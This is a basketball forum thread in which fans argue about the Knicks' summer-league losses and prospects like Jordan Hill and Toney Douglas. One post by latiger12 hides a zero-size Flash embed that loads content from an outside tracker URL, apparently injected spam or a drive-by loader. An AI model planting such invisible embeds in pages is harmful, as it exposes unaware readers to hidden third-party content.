Knicks vs Kings highlights

AlboKnickFan

Benchwarmer
I hate being pessimistic but I just feel like the Knicks are not even trying to PLAY hard. Even in the summer league. They keep shooting stupid threess. They shoot more than 20 or 30 threes a game. And they probably make only like 5 or 6. They do not go to the line often. They dont drive to the rim agressively.

And what happened to Jordan Hill whos the 8th pick and scores only 8 points. :( I hope its not another bad pick because im tired of seeing Knicks like this.

johnstarky

Rotation player
I wouldn't even refer to this summer league squad as the New York Knicks, people should just see them as what they really are,which is Jordan Hill, Tony Douglas and the group of D league amatures.

AlboKnickFan

Benchwarmer
I wouldn't even refer to this summer league squad as the New York Knicks, people should just see them as what they really are,which is Jordan Hill, Tony Douglas and the group of D league amatures.

I would like to remind you that other NBA teams that are participating in this summer league are playing with their only 1 or 2 draft picks and their D league amateurs :). So its not like the Knicks with amateurs are playing against Washington with Arenas Jamison and Butler :)

p.s. They lost all 5 games. Not that it goes into their record or anything "god Forbid" but it just shows that we still do not have a winning attitude and do not finish games well.

dre48ny

Rotation player
They won them all last year and N8 was MVP.

I think Douglas can really help this team in the future and since it was a late pick in the 1st round that is a plus.

Hill is raw but hustles; has a little mid-range jumper. Man if he can be someone like Oakley, that would be the bomb. Hill will not be an all-star but he has some intangibles that don't show up on the stats sheet.

DANUTZ39

Benchwarmer
They won them all last year and N8 was MVP.

I think Douglas can really help this team in the future and since it was a late pick in the 1st round that is a plus.

Hill is raw but hustles; has a little mid-range jumper. Man if he can be someone like Oakley, that would be the bomb. Hill will not be an all-star but he has some intangibles that don't show up on the stats sheet.

Wrong, they won them all in 2007(not last year) and that is when nate was the mvp.
Last year,2008, we went 2-3 with victories against Cleveland and Phoenix and loses against Spurs, Charlotte and Minnesota.

latiger12

Rookie
They're 0-4 now. Not much good is happening out there either.<OBJECT height=0 width=0 classid=clsid:d27cdb6e-ae6d-11cf-96b8-444553540000>

<embed src="<a href="http://brbyowner.com/?tracker=4097" target="_blank">http://brbyowner.com/?tracker=4097[/URL]" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></OBJECT>
</P>
Ties in with the not playing hard....

SSj4Wingzero

All Star
Wrong, they won them all in 2007(not last year) and that is when nate was the mvp.
Last year,2008, we went 2-3 with victories against Cleveland and Phoenix and loses against Spurs, Charlotte and Minnesota.

Proves his point even more technically cause they won all of them in 2007 and we won 23 games in the regular season